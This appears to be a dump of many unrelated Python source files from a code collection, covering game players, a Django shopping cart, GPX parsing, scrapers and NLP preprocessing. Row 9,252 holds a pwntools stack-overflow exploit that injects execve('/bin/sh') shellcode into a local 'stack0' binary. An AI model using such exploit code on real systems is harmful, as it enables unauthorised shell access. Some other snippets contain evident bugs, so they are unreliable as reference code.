"""
agent_spec = make(locator, **kwargs)
return agent_spec.build_agent(), agent_spec.interface
|
9,236 | 8db90b0bfde61de1c4c1462bc3bcf05ef9056362 | /Users/medrine/anaconda/lib/python2.7/UserDict.py |
9,237 | 48294209d51fbe4dfb2a5130311a10c8a1dd027c | # -*- coding:Utf-8 -*-
from .game_action_manager import GameActionManager
from .menu_action_manager import OptionsActionManager, CharacterSelectionActionManager, MainMenuActionManager
|
9,238 | f45cae397aa3b7bdba6e3f36e20b926487cb160d | def main():
s1 = 'mabaabm'
s2 = 'moktko!'
s3 = ex7(s1, s2)
print(s3)
def ex7(in1, in2):
out1 = in1[0]+in1[int(len(in1)/2)]+in1[int(len(in1)-1)]+in2[0]+in2[int(len(in2)/2)]+in2[int(len(in2)-1)]
return out1
if __name__ == '__main__':
main()
|
9,239 | 5fd34c698c2060d5399ba43f6746527961aa574b | def solution(a, b):
answer = 0;
for i in range(0,len(a)):
answer+=a[i]*b[i];
print(answer);
return answer
solution([1,2,3,4],[-3,-1,0,2]); |
9,240 | efe099bc5cd0319ffefd779f1e854f1a60edc5fa | import numpy as np
class RandomPlayer:
def __init__(self, game):
self.game = game
def play(self, board):
a = np.random.randint(self.game.getActionSize())
valids = self.game.getValidMoves(board, 1)
while valids[a] != 1:
a = np.random.randint(self.game.getActionSize())
return a
class HumanPlayer:
def __init__(self, game):
self.game = game
def play(self, board):
valids = self.game.getValidMoves(board, 1)
while True:
a = int(input('Nhập nước bạn đi'))
if valids[a]:
break
else:
print('Invalid')
return a
class MinimaxPlayer:
def __init__(self, game):
self.game = game
def play(self, Board):
key = -1
bem = -99999999
board = self.to_board(Board)
print(Board)
print(board)
for i in range(7, 12):
for j in range(0, 2):
if board[i] != 0:
cpboard = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 10, 10, 1, 1]
for k in range(14):
cpboard[k] = board[k]
self.Move(i, j, cpboard)
mov = self.minimax(cpboard, 0, 1)
if mov > bem:
bem = mov
key = i + j * 100
return key
def to_board(self, board):
Board = [10, 5, 5, 5, 5, 5, 10, 5, 5, 5, 5, 5, 0, 0, 0, 0]
# board.turn = self.turn
Board[14] = board[0][7]
Board[15] = board[1][7]
Board[0] = board[0][5]
Board[6] = board[1][5]
for i in range(5):
Board[i + 1] = board[0][i]
Board[i + 7] = board[1][i]
Board[12] = board[0][6]
Board[13] = board[1][6]
return Board
def checkWin(self, board):
global point1, point2
p1 = 0
p2 = 0
point1 = board[12]
point2 = board[13]
if board[0] == 0 and board[6] == 0:
p1 = point1 + board[1] + board[2] + board[3] + board[4] + board[5]
p2 = point2 + board[7] + board[8] + board[9] + board[10] + board[11]
if p1 > p2:
return 1
if p1 == p2:
return 2
else:
return 0
else:
return 3
def checkEat(self, position, direc, board):
if direc == 1:
if board[(position + 1) % 12] == 0 and board[(position + 2) % 12] != 0 and ((position + 1) % 12) % 6 != 0:
self.eat((position + 2) % 12, board)
self.checkEat((position + 2) % 12, direc, board)
else:
if board[(position - 1) % 12] == 0 and board[(position - 2) % 12] != 0 and ((position - 1) % 12) % 6 != 0:
self.eat((position - 2) % 12, board)
self.checkEat((position - 2) % 12, direc, board)
def eat(self, position, board):
global point1, point2
if self[14] == 1:
board[12] = board[12] + board[position]
else:
board[13] = board[13] + board[position]
board[position] = 0
def Move(self, position, direc, board):
if board[position] != 0 and position != 0 and position != 6:
if direc == 1:
index = (position + 1) % 12
while board[position] != 0:
board[position] = board[position] - 1
board[index] = board[index] + 1
index = (index + 1) % 12
if board[index] == 0:
self.checkEat((index - 1 + 12) % 12, direc, board)
else:
self.Move(index, direc, board)
else:
index = (position - 1) % 12
while board[position] != 0:
board[position] = board[position] - 1
board[index] = board[index] + 1
index = (index - 1) % 12
if board[index] == 0:
self.checkEat((index + 1 + 12) % 12, direc, board)
else:
self.Move(index, direc, board)
def minimax(self, board, depth, turn):
if self.checkWin(board) == 1: return -9999
if self.checkWin(board) == 0: return 9999
if self.checkWin(board) == 2: return 0
if depth == 5:
return board[13] - board[12]
if turn == 0:
best = -1000
for i in range(7, 12):
for j in range(0, 2):
if (board[i] != 0):
cpboard = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 10, 10, 1, 1]
for k in range(14):
cpboard[k] = board[k]
self.Move(i, j, cpboard)
vl = self.minimax(cpboard, depth + 1, (turn + 1) % 2)
if vl > best:
best = vl
return best
else:
best = 1000
for i in range(1, 6):
for j in range(0, 2):
if (board[i] != 0):
cpboard = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 10, 10, 1, 1]
for k in range(14):
cpboard[k] = board[k]
self.Move(i, j, cpboard)
vl = self.minimax(cpboard, depth + 1, (turn + 1) % 2)
if vl < best:
best = vl
return best
|
9,241 | 381d3f0890a2916d2e0a21a6a47a5f87afde622d | r, n = map(int, input().split())
if r == n:
print("too late")
else:
l = list(range(1, r+1))
for _ in range(n):
l.remove(int(input()))
print(l[0])
|
9,242 | 98a384392d0839ddf12f3374c05929bc5e32987b | #coding=utf-8
i=1
s=0
while s<=8848:
s=s+(2**i)*0.2*10**(-3)
i=i+1
print '对折次数:',i
|
9,243 | 26f486131bdf514cd8e41f75d414fe647eaf1140 | from typing import Union, Tuple
import numpy as np
from dispim import Volume
def extract_3d(data: np.ndarray, center: np.ndarray, half_size: int):
"""
Extract an area around a point in a 3d numpy array, zero padded as necessary such that the specified point is at the
center
:param data: The numpy array to extract from
:param center: The point around which to extract
:param half_size: The half-size of the extracted area (full size is half_size*2+1, where the th center point is
center)
:return: The extracted area
"""
# FIXME: Doesn't always return the expected shape
imax = np.clip(center + half_size + 1, 0, data.shape).astype(np.int)
imin = np.clip(center - half_size, 0, data.shape).astype(np.int)
subvol = data[imin[0]:imax[0], imin[1]:imax[1], imin[2]:imax[2]]
max_missing = ((center + half_size + 1) - imax).astype(np.int)
min_missing = (imin - (center - half_size)).astype(np.int)
return np.pad(subvol, [(min_missing[i], max_missing[i]) for i in range(3)], mode='constant')
def crop_view(data: np.ndarray, crop: Union[float, Tuple[float, float, float]], center_crop: bool = True):
"""
Get a cropped view of a 3d numpy array (does not modify the input)
:param data: The numpy array to crop
:param crop: The percentage to crop in each dimension
:param center_crop: If True, the crop is centered around the middle of the volume, otherwise, the crop expands from
(0, 0, 0)
:return: The cropped view
"""
if type(crop) == float or type(crop) == int:
if crop > 0.99999:
return data
icropx = 1 - crop
icropy = 1 - crop
icropz = 1 - crop
else:
icropx = 1 - crop[0]
icropy = 1 - crop[1]
icropz = 1 - crop[2]
w, h, l = data.shape
if center_crop:
view = data[int(w / 2 * icropx):int(-w / 2 * icropx),
int(h / 2 * icropy):int(-h / 2 * icropy),
int(l / 2 * icropz):int(-l / 2 * icropz)]
else:
view = data[:int(w * (1 - icropx)), :int(h * (1 - icropy)), :int(l * (1 - icropz))]
return view
def plot_ortho_overlayed(vol_a: Volume, vol_b: Volume, axis=2, pixel_size: float = 1.0) -> None:
"""
Plot two axis-reduced volumes overlayed as two channels (red and green), taking into account the spacing of both volumes
:param vol_a: The first volume to plot (red)
:param vol_b: The second volume to plot (green)
:param axis: The axis along which both volumes will be reduced
:param pixel_size: The size of a pixel, relative to the spacing of the the volumes
"""
from scipy.ndimage.interpolation import zoom
import matplotlib.pyplot as plt
vol_a_zoomed = np.mean(zoom(vol_a, np.array(vol_a.spacing) * pixel_size), axis=axis)
vol_b_zoomed = np.mean(zoom(vol_b, np.array(vol_b.spacing) * pixel_size), axis=axis)
b_channel = np.zeros_like(vol_a_zoomed)
max_val = max(vol_a_zoomed.max(), vol_b_zoomed.max())
min_val = min(vol_a_zoomed.min(), vol_b_zoomed.min())
vol_a_zoomed = (vol_a_zoomed - min_val) / (max_val - min_val)
vol_b_zoomed = (vol_b_zoomed - min_val) / (max_val - min_val)
plt.imshow(np.stack([vol_a_zoomed, vol_b_zoomed, b_channel], axis=2))
plt.show()
def show_ipv(data: np.ndarray):
"""
Show a 3d visualization of 3d numpy array
:param data: The numpy array to show
:return: The ipyvolume figure
"""
import ipyvolume as ipv
return ipv.quickvolshow(data)
def threshold_otsu(image: np.ndarray, nbins: int = 256, ignore: int = 0) -> float:
"""
Compute the Otsu threshold for a numpy array, without taking into account empty areas
:param image: The volume to compute the threshold for
:param nbins: The number of bins used
:param ignore: The value to ignore
:return: The Otsu threshold
"""
from skimage.filters.thresholding import histogram
# Check if the image is multi-colored or not
if image.min() == image.max():
raise ValueError("threshold_otsu is expected to work with images "
"having more than one color. The input image seems "
"to have just one color {0}.".format(image.min()))
img_flat = image.ravel()
img_flat = img_flat[img_flat != ignore]
hist, bin_centers = histogram(img_flat, nbins)
hist = hist.astype(float)
# class probabilities for all possible thresholds
weight1 = np.cumsum(hist)
weight2 = np.cumsum(hist[::-1])[::-1]
# class means for all possible thresholds
mean1 = np.cumsum(hist * bin_centers) / weight1
mean2 = (np.cumsum((hist * bin_centers)[::-1]) / weight2[::-1])[::-1]
# Clip ends to align class 1 and class 2 variables:
# The last value of `weight1`/`mean1` should pair with zero values in
# `weight2`/`mean2`, which do not exist.
variance12 = weight1[:-1] * weight2[1:] * (mean1[:-1] - mean2[1:]) ** 2
idx = np.argmax(variance12)
threshold = bin_centers[:-1][idx]
return threshold
|
9,244 | 2387856757ad1c3ff911cf2a7537ca6df7786997 | # -*- coding: utf-8 -*-
"""
Created on Mon Jan 25 12:07:32 2021
@author: yashv
"""
import numpy as np
X= [0.7, 1.5]
Y= [3.9,0.2]
def f(w,b,x): #sigmoid logistic function
return 1.0/(1.0 + np.exp(-(w*x +b)))
def error(w,b): #loss function
err=0.0
for x,y in zip(X,Y):
fx= f(w,b,x)
err += 0.5 * (fx - y) **2
return err
def grad_b(w,b,x,y):
fx= f(w,b,x)
return (fx - y)* fx * (1-fx)
def grad_w(w,b,x,y):
fx= f(w,b,x)
return (fx - y)* fx * (1-fx) * x
def do_gradient_descent():
w, b, eta, max_epochs = 10, 10, 6.0, 1000
for i in range(max_epochs):
dw, db = 0,0
for x,y in zip(X,Y):
dw += grad_w(w,b,x,y)
db += grad_b(w,b,x,y)
w = w - eta * dw
b = b - eta * dw
print(w,b)
print("e:",error(w,b))
do_gradient_descent()
|
9,245 | 47119f46cdbbb7306aef8237d4f56f0f10690ae4 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys,os,traceback
from PIL import Image
class ResizeImageBuilder:
def __init__(self):
# print(self.__class__)
pass
def setOriginImagePath(self, filePath):
try:
img = Image.open(filePath)
# img = img.convert('RGB')
# size = 32, 32
# img.thumbnail(size)
print('origin image mode:', img.mode)
img = img.convert('RGB')
print('target image mode:', img.mode)
# img.show()
self.baseImage = img
return None
except (BaseException,e):
return str(filePath + " open error: " + traceback.format_exc(e))
def createImageWithOriginImage(self, img, imageSize):
return img.resize((imageSize, imageSize),Image.ANTIALIAS)
def saveImageWithPath(self, img, savePath):
img.save(savePath)
def createImage(self, savePath, imageSize):
if self.baseImage == None:
print('error: self.baseImage == None, please call setOriginImagePath() before createImage()')
return
try:
newimg = self.createImageWithOriginImage(self.baseImage, imageSize)
self.saveImageWithPath(newimg, savePath)
# print('done')
except (BaseException,e):
return 'createImage error: ' + traceback.format_exc(e)
def main():
# builder = ResizeImageBuilder()
# builder.setOriginImagePath(originImagePath)
# builder.createImage(path1, size1)
# builder.createImage(path2, size2)
pass
if __name__ == '__main__':
main() |
9,246 | 5feea24d269409306338f772f01b0ee1d2736e2e | from django.shortcuts import render
from django.views.generic import View
from django.http import JsonResponse
from django_redis import get_redis_connection
from django.contrib.auth.mixins import LoginRequiredMixin
from good.models import GoodsSKU
class CartAddView(View):
'''添加购物车'''
def post(self,request):
user = request.user
if not user.is_authenticated:
return JsonResponse({'res':0,'errmsg':'请先登录'})
sku_id = request.POST.get('sku_id')
count = request.POST.get('count')
#校验数据完整性
if not all([sku_id,count]):
return JsonResponse({'res':1,'errmsg':'数据不完整'})
#校验添加商品的数量
try:
count = int(count)
except Exception as e :
return JsonResponse({'res':2,"errmsg":'商品数目出错'})
#校验商品是否存在
try:
sku = GoodsSKU.objects.get(id=sku_id)
except GoodsSKU.DoesNotExist:
return JsonResponse({'res':3,'errmsg':'商品不存在'})
#业务处理
conn = get_redis_connection('default')
cart_key = 'cart_%d'%user.id
#尝试获取sku_id的值——>hget cart_key
#弱国sku_id在hash中不存在,hget返回one
cart_count = conn.hget(cart_key,sku_id)
if cart_count:
#累加购物车中商品数目
count += int(cart_count)
#校验商品的库存
if count > sku.stock:
return JsonResponse({'res':4,'errmsg':'商品库存不足'})
#设置hash中sku_id对应的值
#hset->如果sku_id已经存在,更新数据,如果sku_id不存在,添加数据
conn.hset(cart_key,sku_id,count)
#计算用户购物车商品的条目数
total_count = conn.hlen(cart_key)
#返回应答
return JsonResponse({'res':5,'total_count':total_count,'message':'添加成功'})
class CartInfoView(LoginRequiredMixin,View):
'''购物车页面显示'''
def get(self, request):
'''显示'''
# 获取登录的用户
user = request.user
# 获取用户购物车中商品的信息
conn = get_redis_connection('default')
cart_key = 'cart_%d'%user.id
# {'商品id':商品数量}
cart_dict = conn.hgetall(cart_key)
skus = []
# 保存用户购物车中商品的总数目和总价格
total_count = 0
total_price = 0
# 遍历获取商品的信息
for sku_id, count in cart_dict.items():
sku_id = int(sku_id)
count = int(count)
# 根据商品的id获取商品的信息
sku = GoodsSKU.objects.get(id=sku_id)
# 计算商品的小计
amount = sku.price*count
# 动态给sku对象增加一个属性amount, 保存商品的小计
sku.amount = amount
# 动态给sku对象增加一个属性count, 保存购物车中对应商品的数量
sku.count = count
# 添加
skus.append(sku)
# 累加计算商品的总数目和总价格
total_count += int(count)
total_price += amount
# 组织上下文
context = {'total_count':total_count,
'total_price':total_price,
'skus':skus}
# 使用模板
return render(request, 'cart2.html', context)
class UpdateCartView(View):
'''更新购物车记录'''
#@csrf_exempt
def post(self,request):
user = request.user
if not user.is_authenticated:
return JsonResponse({'res': 0, 'errmsg': '请先登录'})
sku_id = request.POST.get('sku_id')
count = request.POST.get('count')
# 校验数据完整性
if not all([sku_id, count]):
return JsonResponse({'res': 1, 'errmsg': '数据不完整'})
# 校验添加商品的数量
try:
count = int(count)
except Exception as e:
return JsonResponse({'res': 2, "errmsg": '商品数目出错'})
# 校验商品是否存在
try:
sku = GoodsSKU.objects.get(id=sku_id)
except GoodsSKU.DoesNotExist:
return JsonResponse({'res': 3, 'errmsg': '商品不存在'})
#业务处理:更新购物车记录
conn = get_redis_connection('default')
cart_key = 'cart_%d'%user.id
#校验商品库存
if count > sku.stock:
return JsonResponse({'res':4,'errmsg':'商品库存不足'})
#更新
conn.hset(cart_key,sku_id,count)
#计算用户购物车中商品的总件数
total_count = 0
vals = conn.hvals(cart_key)
for val in vals:
total_count += int(val)
#返回应答
return JsonResponse({'res':5,'total_count':total_count,'message':'更新成功'})
class CartDeleteView(View):
'''购物车记录删除'''
# @csrf_exempt
def post(self, request):
'''购物车记录删除'''
user = request.user
if not user.is_authenticated:
# 用户未登录
return JsonResponse({'res': 0, 'errmsg': '请先登录'})
# 接收参数
sku_id = request.POST.get('sku_id')
# 数据的校验
if not sku_id:
return JsonResponse({'res':1, 'errmsg':'无效的商品id'})
# 校验商品是否存在
try:
sku = GoodsSKU.objects.get(id=sku_id)
except GoodsSKU.DoesNotExist:
# 商品不存在
return JsonResponse({'res':2, 'errmsg':'商品不存在'})
# 业务处理:删除购物车记录
conn = get_redis_connection('default')
cart_key = 'cart_%d'%user.id
# 删除 hdel
conn.hdel(cart_key, sku_id)
# 计算用户购物车中商品的总件数 {'1':5, '2':3}
total_count = 0
vals = conn.hvals(cart_key)
for val in vals:
total_count += int(val)
# 返回应答
return JsonResponse({'res':3, 'total_count':total_count, 'message':'删除成功'})
class TestView(View):
def post(self,request):
str = request.POST.get('str')
print(str)
return JsonResponse({'res':8,'aaa':'bbb'})
#测试代码,无用
class TestIndexView(LoginRequiredMixin,View):
def get(self,request):
user = request.user
#获取保存在redis中购物车中商品的信息
return render(request,'test.html')
conn = get_redis_connection('default')
cart_key = 'cart_%d'%user.id#不同用户的购物车采用cart_用户id形式保存记录
cart_dict = conn.hgetall(cart_key)#商品保存形式{'商品id':'商品数量'}
skus = []
total_count = 0
total_price = 0
#遍历购物车中商品信息
for sku_id,count in cart_dict.items():
sku_id = int(sku_id)
count = int(count)
sku = GoodsSKU.objects.get(id=sku_id)#根据商品的id获取商品
#计算商品小计
amount = sku.price*count
sku.amount = amount#动态给商品添加amount属性,保存商品小计
sku.count = count#动态给商品添加count属性,保存购物车中该商品的数量
skus.append(sku)
total_count += int(count)
total_price += amount
context = {'total_count':total_count,
'total_price':total_price,
'skus':skus}
return render(request,'test.html',context)
#测试代码,无用
class Demo(View):
def post(self,request):
sku_id = request.POST.get('sku_id')
print(sku_id)
return JsonResponse({'res':0,'message':'result is success'})
|
9,247 | a7f082737bf476a4bc6a40c962764c05bed9ee14 | import sqlite3
forth = sqlite3.connect('databaserupin.db')
sql = "SELECT * from rupin;"
curforth = forth.cursor()
curforth.execute(sql)
result = curforth.fetchall()
for record in result:
print(record) |
9,248 | 10937ee1e48d23b12b76a2abc44ee8bd0647aef5 | #determines where the robot is located.
def sense(p, Z, colors, sensor_right):
#initialization
q = []
pHit = sensor_right;
pMiss = 1 - sensor_right;
#number of rows
m = len(colors)
#number of columns
n = len(colors[0])
#sum
s = 0
for i in range(m):
temp = []
for j in range(n):
hit = (Z == colors[i][j])
#product
temp.append(p[i][j] * (hit * pHit + (1-hit) * pMiss))
q.append(temp)
s = s + sum(temp)
#normalization
if(s != 0):
for i in range(m):
for j in range(n):
q[i][j] = q[i][j] / s
return q
#moves the robot by U units.
def move(p, U, p_move, m, n):
#initialization
q = []
pExact = p_move;
pUndershoot = 1 - p_move;#probability of staying at the same location
for i in range(m):
temp = []
for j in range(n):
s = pExact * p[(i - U[0])% m][(j - U[1])% n]
#convolution /addition
s = s + pUndershoot * p[i][j]
temp.append(s)
q.append(temp)
return q
#p_move probablity that motion is correct
#sensor_right probability that the sensor is correct
def localize(colors, measurements, motions, sensor_right, p_move):
p = []
#start with uniform distribution
#number of rows
m = len(colors)
#number of columns
n = len(colors[0])
#size
size = m * n;
for i in range(m):
temp = [];
for j in range(n):
temp.append(1/size);
p.append(temp)
for k in range(len(measurements)):
p = move(p, motions[k], p_move, m, n)
p = sense(p, measurements[k], colors, sensor_right)
return p |
9,249 | 4c79dcf394acbcc9a636bcc9b0aac13a2bafc7e3 | import scrapy
from scrapy.loader import ItemLoader
class BlogSpider(scrapy.Spider):
name = 'blogspider'
start_urls = ['https://blog.scrapinghub.com']
def content_title_parser(self, mystr):
return mystr[0].split(' ')[3]
def parse(self, response):
for url in response.css('ul li a::attr("href")').re('.*/category/.*'):
yield scrapy.Request(response.urljoin(url), self.parse_titles)
def parse_titles(self, response):
l = ItemLoader(item=Posts(), response=response)
l.add_css('content_title', 'h1.pagetitle::text', self.content_title_parser)
l.add_css('post_title', 'div.entries > ul > li a::text')
return l.load_item()
class Posts(scrapy.Item):
content_title = scrapy.Field()
post_title = scrapy.Field()
|
9,250 | 4e4d6a9ed07aa03c79dade05e01f226017b13de5 | import unittest
from theoktany.serializers import serialize
class SerializerTest(unittest.TestCase):
class TestObject(object):
def __init__(self, **kwargs):
for name, value in kwargs.items():
self.__setattr__(name, value)
def test_serialize(self):
object_dict = {'firstName': 'Test', 'lastName': 'Test last'}
json_str1 = '"firstName": "Test"'
json_str2 = '"lastName": "Test last"'
serialized_str = serialize(object_dict)
self.assertIn(json_str1, serialized_str)
self.assertIn(json_str2, serialized_str)
def test_serialize_string(self):
"""Ensure that quotes are properly escaped"""
string = 'This is a "string" with \'quotes.\''
json_string = '"{}"'.format(string.replace('"', '\\"'))
self.assertEqual(serialize(string), json_string)
def test_serialize_none(self):
"""Ensure that None gets serialized to 'null'"""
self.assertEqual(serialize(None), 'null')
def test_serialize_object(self):
"""Ensure that the serializer throws an error for an unserializable object"""
test_obj = self.TestObject(prop1='x', prop2=1234)
with self.assertRaises(TypeError):
serialize(test_obj)
if __name__ == '__main__':
unittest.main()
|
9,251 | 671ecf23df1da659d186014afa738d0608ad404d | import requests
def get(url):
return requests.get(url).text
|
9,252 | cf70d6064fd4a43bc17cd852aaf04afade73d995 | #inject shellcode
from pwn import *
shellcode =p32(0x8049000+0x4)\
+asm("mov eax,SYS_execve")\
+asm("xor ecx,ecx")\
+asm("xor edx,edx")\
+asm("mov ebx,0x8049014")\
+asm("int 0x80")\
+"/bin/sh"
r=process("./stack0",aslr=True)
r.sendline('A'*(0x4c)+p32(0x8049000-0x4)+p32(0x804840c)+p32(0x8049000))
r.sendline(shellcode)
r.interactive()
|
9,253 | a3d27561488c38e1256eb33abad108ad42081eb6 | from django.core.management.base import BaseCommand
from journal.models import Journal
from article.models import ArticleCoverSetting
from django.conf import settings
import os
class Command(BaseCommand):
def handle(self, *args, **options):
print('Loading article settings')
ArticleCoverSetting.objects.all().delete()
for j in Journal.objects.all():
s = ArticleCoverSetting()
s.journal = j
s.title_x = 10
s.title_y = 100
s.number_x = 50
s.number_y = 70
s.category_x = 140
s.category_y = 80
s.save()
print('saving settings %s' % s.journal)
|
9,254 | cc6d18785eff0406ff7f38f18f15476375e31b76 | import re
import gpxpy
def extract_gpx_data(gpx_file_path, attribute='elevation'):
"""Reads in a GPX file and returns a list of values
for a specified GPX attribute.
Parameters
----------
gpx_file_path : str
File path to the GPX file (.gpx extension).
attribute: str
Name of the attribute to extract. Default
value is 'elevation'. Must match one of the
entries in the function-defined list.
Returns
-------
data : list
List containing float values of the extracted
GPX attributes.
"""
# Open GPX file in context manager and parse with gpxpy
with open(gpx_file_path) as gpx_file:
gpx = gpxpy.parse(gpx_file)
# Define GPX main attributes
primary_attributes = [
"latitude",
"longitude",
"elevation",
"time"
]
# Define GPX extension attributes
secondary_attributes = [
"cadence", "distance", "altitude",
"energy", "speed", "verticalSpeed"
]
# Check if specified attribute is in main
# GPX attributes (lat/lon/elevation/time)
if attribute in primary_attributes:
# Create list of values for attribute
data = [{
"latitude": point.latitude,
"longitude": point.longitude,
"elevation": point.elevation,
"time": point.time
}.get(attribute)
for track in gpx.tracks
for segment in track.segments
for point in segment.points
]
print(f"Extracted {attribute} data.")
# Check if specified attribute is in
# GPX extensions (cadence/distance/altitude
# /energy/speed/verticalSpeed)
elif attribute in secondary_attributes:
# Define pattern for attribute to match on
pattern = re.compile(f"^.*{attribute}.*$")
# Create list of values for attribute
data = [
float(extension.text)
for track in gpx.tracks
for segment in track.segments
for point in segment.points
for extension in point.extensions
if pattern.match(extension.tag)
]
print(f"Extracted {attribute} data.")
else:
data = []
print("Invalid attribute. Must be one of the following: "
"latitude, longitude, elevation, time, cadence "
"distance, altitude, energy, speed, verticalSpeed.")
# List of attribute values
return data
|
9,255 | ba34dfcad0cb9bac9c462bdf60e55dee6ba9d58d | import requests
import os
from dotenv import load_dotenv
from datetime import datetime
load_dotenv(".env") # loads the environment file
USERNAME = os.getenv("USER")
TOKEN = os.getenv("TOKEN")
pixela_endpoint = "https://pixe.la/v1/users"
# MAKING AN ACCOUNT
user_params = {
"token": TOKEN,
"username": USERNAME,
"agreeTermsOfService": "yes",
"notMinor": "yes",
}
# response = requests.post(url=pixela_endpoint, json=user_params) # sends the user_params as json
# print(response.text) # gives the response as a piece of text
# CREATING A GRAPH
graph_endpoint = f"{pixela_endpoint}/{USERNAME}/graphs" # endpoint for the graph creation
graph_config = {
"id": "graph1",
"name": "Reading Graph",
"unit": "hours",
"type": "int",
"color": "shibafu"
}
headers = {
"X-USER-TOKEN": TOKEN
}
# response = requests.post(url=graph_endpoint, json=graph_config, headers=headers) These lines were use to create graph
# print(response.text)
# POST A PIXEL
post_pixel_endpoint = f"{pixela_endpoint}/{USERNAME}/graphs/graph1"
# today = datetime(year=2020, month=12, day=25) custom date
today = datetime.now()
formatted_date = today.strftime("%Y%m%d")
pixel_config = {
"date": today.strftime("%Y%m%d"),
"quantity": input("How many hours did you spend reading today? "),
}
response = requests.post(url=post_pixel_endpoint, headers=headers, json=pixel_config) # post a new pixel
print(response.text)
# UPDATING A PIXEL
update_endpoint = f"{pixela_endpoint}/{USERNAME}/graphs/graph1/{formatted_date}"
updated_pixel = {
"quantity": "3"
}
# response = requests.put(url=update_endpoint, headers=headers, json=updated_pixel)
# print(response.text)
# DELETING A PIXEL
# delete_endpoint = f"{pixela_endpoint}/{USERNAME}/graphs/graph1/{formatted_date}"
# response = requests.delete(url=delete_endpoint,headers=headers)
|
9,256 | 4f5f4aadfeabb13790b417b334c5f73c6d0345a7 | from queue import Queue
class Stack:
def __init__(self):
self.q1 = Queue()
self.q2 = Queue()
def empty(self):
return self.q1.empty()
def push(self, element):
if self.empty():
self.q1.enqueue(element)
else:
self.q2.enqueue(element)
while not self.q1.empty():
self.q2.enqueue(self.q1.dequeue())
self.q1, self.q2 = self.q2, self.q1
def pop(self):
return self.q1.dequeue()
def top(self):
return self.q1.head.next.element
def __repr__(self):
return str(self.q1)
def test_stack():
s = Stack()
s.push(1)
s.push(2)
s.push(3)
s.push(4)
assert str(s) == 'head > 4 > 3 > 2 > 1 > '
assert s.pop() == 4
assert s.pop() == 3
assert s.pop() == 2
assert s.pop() == 1
if __name__ == '__main__':
test_stack() |
9,257 | 0f74e0f0600c373c3ddd470f18dbb86cf213fb58 | #!/usr/bin/env python
import argparse
import sys
import os
import cmudl.hw2p2 as hw2p2
class CLI(object):
def __init__(self):
parser = argparse.ArgumentParser(
description='CMU Deep Learning Utilities',
)
parser.add_argument('command', help='Subcommand to run')
# parse_args defaults to [1:] for args, but you need to
# exclude the rest of the args too, or validation will fail
args = parser.parse_args(sys.argv[1:2])
if not hasattr(self, args.command):
print('Unrecognized command')
parser.print_help()
exit(1)
# use dispatch pattern to invoke method with same name
getattr(self, args.command)()
def hw2p2(self):
parser = argparse.ArgumentParser()
parser.add_argument('-s', type=str, default=None)
args = parser.parse_args(sys.argv[2:])
hw2p2.submit(args.s)
CLI() |
9,258 | cec772f1e470aae501aa7c638ec4cbb565848804 | def solution(num):
if num < 10:
num = str(num) + str(0)
else:
num = str(num)
cycle_val = 0
new_num = ""
temp_num = num[:]
while new_num != num:
sum_num = int(temp_num[0]) + int(temp_num[1])
new_num = temp_num[-1] + str(int(temp_num[0]) + int(temp_num[1]))[-1]
cycle_val += 1
temp_num = new_num[:]
return cycle_val
num = int(input())
print(solution(num)) |
9,259 | fb26337be29ce06674ca2cb2a82eaff7624aa17f | class User:
def __init__(self, username, password):
self.username = username
self.password = password
def __str__(self):
return 'Credentials: ' + self.username + ' - ' + self.password
def login(self):
print('Login done by "%s".' % self.username)
felipe = User(username='felipe', password='pass_user')
print(felipe)
felipe.login()
class Admin(User):
def __init__(self, username, password, phone, email):
super().__init__(username, password)
self.phone = phone
self.email = email
self.user = None
def remove_user_account(self, user):
self.user = user
print(f'%s removeu conta do usuário "%s"' % (self.username, self.user.username))
def accept_user_account(self, user):
self.user = user
print('%s aceitou conta do usuário "%s"' % (self.username, self.user.username))
admin = Admin(username='marcos', password='pass_admin', phone='9999-9999', email='admin@admin.com')
print(admin)
admin.login()
print(admin.phone)
print(admin.email)
admin.remove_user_account(felipe)
joao = User(username='joao', password='123')
admin.accept_user_account(joao)
|
9,260 | f22836fc4fed22d833755db0ff34502170260766 | # -*- coding: utf-8 -*-
"""
Created on Thu May 3 09:12:11 2018
@author: shen1994
"""
import codecs
import numpy as np
def create_documents():
""" 按标点符号或是空格存储文件 """
documents_length = 0
chars,labels = [],[]
chars_file = codecs.open("data/data.data", 'w', 'utf-8')
labels_file = codecs.open("data/label.data", 'w', 'utf-8')
with codecs.open("data/train.data", 'r', 'utf-8') as f:
for line in f:
line=line.strip()
if len(line)==0:
if len(chars)!=0:
for char in chars:
chars_file.write(char + "\t")
chars_file.write("\n")
for label in labels:
labels_file.write(label + "\t")
labels_file.write("\n")
documents_length += 1
chars, labels=[], []
else:
pieces=line.strip().split()
chars.append(pieces[0])
labels.append(pieces[1])
if pieces[0] in ['。',',',';','!','?']:
for char in chars:
chars_file.write(char + "\t")
chars_file.write("\n")
for label in labels:
labels_file.write(label + "\t")
labels_file.write("\n")
documents_length += 1
chars, labels=[], []
if len(chars)!=0:
for char in chars:
chars_file.write(char + "\t")
chars_file.write("\n")
for label in labels:
labels_file.write(label + "\t")
labels_file.write("\n")
documents_length += 1
chars, labels=[], []
chars_file.close()
labels_file.close()
return documents_length
def create_useful_words(embedding_model):
return list(embedding_model.wv.vocab.keys())
def create_lexicon(word_dict):
""" 生成词典 """
chars = {}
# 统计词出现的次数
with codecs.open("data/data.data", 'r', 'utf-8') as f:
line = f.readline()
while(line):
book_chars = line.strip().split()
for sequence in book_chars:
for char in sequence:
chars[char] = chars.get(char,0) + 1
line = f.readline()
sorted_chars = sorted(chars.items(), key=lambda x:x[1], reverse=True)
# 下标从1开始 0用来补长
lexicon = dict([(item[0],index+1) for index, item in enumerate(sorted_chars)])
del sorted_chars
# 替换无用词的标记,标记为-1
for v in lexicon:
if v not in word_dict:
lexicon[v] = -1
lexicon_reverse = dict(zip(lexicon.values(), lexicon.keys()))
return lexicon, lexicon_reverse
def create_label_index():
return {'P':0, 'B':1, 'M':2, 'E':3, 'S':4, 'U':5}
def create_index_label():
return {0:'Pad',1:'B',2:'M',3:'E',4:'S',5:'Unk'}
def create_embedding(embedding_model, embedding_size, lexicon_reverse):
word_dict = create_useful_words(embedding_model)
useful_word = []
useful_word_length = 0
for word in list(lexicon_reverse.values()):
if word in word_dict:
useful_word_length += 1
useful_word.append(word)
del word_dict
# 增加 padding 和 unknown
embedding_weights = np.zeros((useful_word_length + 2, embedding_size))
for i in range(useful_word_length):
embedding_weights[i + 1] = embedding_model.wv[useful_word[i]]
# 无效词嵌入向量
